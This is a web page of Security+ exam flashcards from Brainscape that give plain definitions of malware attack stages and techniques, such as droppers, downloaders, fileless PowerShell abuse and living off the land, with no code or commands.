Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

CompTIA Security + (SY0-701) > Section 6.57 Malware Attack Techniques > Flashcards

Section 6.57 Malware Attack Techniques Flashcards

Objectives 2.4 Given a Scenario, analyse indicators of malicious activity

1
Q

Method of attack: Think modern

Malware Attack Techniques

A

The specific method by which malware code penetrates and infects a targeted system

■ Most modern malware uses fileless techniques to avoid detection from signature-based security software.
■ Fileless malware infects the systems memory (RAM) to avoid detection and to execute its malicious code using trusted tools directly from memory.

PowerShell exploitation: PowerShell is commonly exploited by fileless malware for its ability to execute complex operations without generating executable files. Usually, it’s leveraged to download and run payloads directly from memory and bypass scripting restrictions.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Stage 1 Dropper or Downloader

A

When a user accidentally clicks on a malicious link or opens a malicious file, the specific type of malware being installed is known as a Stage One Dropper or Downloader.

The primary function of a stage one dropper or downloader is to retrieve additional portions of the malware code and to trick the user into activating it

This Piece of malware is usually created as a lightweight shellcode that can be executed on a given system

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Dropper

A

Specific malware type designed to initiate or run other malware forms within a payload on an infected host

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Downloader

A

Retrieve additional tools after the initial infection completed by the Dropper

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Shellcode

A

Lightweight code meant to execute an exploit on a given target

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Stage 2: Downloader

A

Downloads and installs a remote access Trojan to conduct command and control on the victimised system

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

“Actions on Objectives” Phase

A

Threat actors will execute primary objectives to meet core objectives like

■ Data exfiltration
■ File encryption

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Concealment

A

Used to help the threat actor prolong unauthorised access to a system by

■ Hiding tracks
■ Erasing log files
■ Hiding any evidence of malicious activity

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

“Living off the Land”

A

■ A strategy adopted by many Advanced Persistent Threats and criminal organizations

■ The threat actors try to exploit the standard tools to perform intrusions

How well did you know this?
1
Not at all
2
3
4
5
Perfectly

CompTIA Security + (SY0-701) (238 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions